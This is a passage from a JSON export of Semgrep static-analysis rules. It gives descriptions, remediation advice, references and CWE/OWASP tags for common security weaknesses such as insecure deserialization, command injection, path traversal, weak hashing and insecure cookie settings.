\"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","id":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","name":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.web.django-cookie-samesite-none.django-cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","id":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","name":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"help":{"markdown":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n - [https://en.wikipedia.org/wiki/Mass_assignment_vulnerability](https://en.wikipedia.org/wiki/Mass_assignment_vulnerability)\n","text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign","id":"javascript.lang.security.insecure-object-assign.insecure-object-assign","name":"javascript.lang.security.insecure-object-assign.insecure-object-assign","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.insecure-object-assign.insecure-object-assign"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","id":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","name":"python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"help":{"markdown":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action)\n - [https://docs.microsoft.com/en-us/azure/firewall/rule-processing](https://docs.microsoft.com/en-us/azure/firewall/rule-processing)\n","text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","id":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","name":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"help":{"markdown":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification)\n - [https://nodejs.org/api/https.html#https_https_request_options_callback](https://nodejs.org/api/https.html#https_https_request_options_callback)\n - [https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100](https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100)\n","text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","id":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","name":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","id":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","name":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A specially crafted calldata may be used to impersonate other accounts"},"help":{"markdown":"A specially crafted calldata may be used to impersonate other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection)\n - [https://rekt.news/superfluid-rekt/](https://rekt.news/superfluid-rekt/)\n - [https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd](https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd)\n - [https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7](https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7)\n","text":"A specially crafted calldata may be used to impersonate other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","id":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","name":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.superfluid-ctx-injection.superfluid-ctx-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","id":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","name":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","id":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","name":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"help":{"markdown":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1)\n - [https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html)\n - [https://shattered.io/](https://shattered.io/)\n","text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","id":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","name":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"help":{"markdown":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none)\n - [https://flask-login.readthedocs.io/en/latest/#session-protection](https://flask-login.readthedocs.io/en/latest/#session-protection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","id":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","name":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","properties":{"precision":"very-high","tags":["CWE-613: Insufficient Session Expiration","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"help":{"markdown":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://words.filippo.io/dispatches/dsa/](https://words.filippo.io/dispatches/dsa/)\n","text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"helpUri":"https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa","id":"python.cryptography.cryptography-dsa.cryptography-dsa","name":"python.cryptography.cryptography-dsa.cryptography-dsa","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.cryptography-dsa.cryptography-dsa"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"help":{"markdown":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection","id":"python.flask.security.injection.subprocess-injection.subprocess-injection","name":"python.flask.security.injection.subprocess-injection.subprocess-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.subprocess-injection.subprocess-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","id":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","name":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web 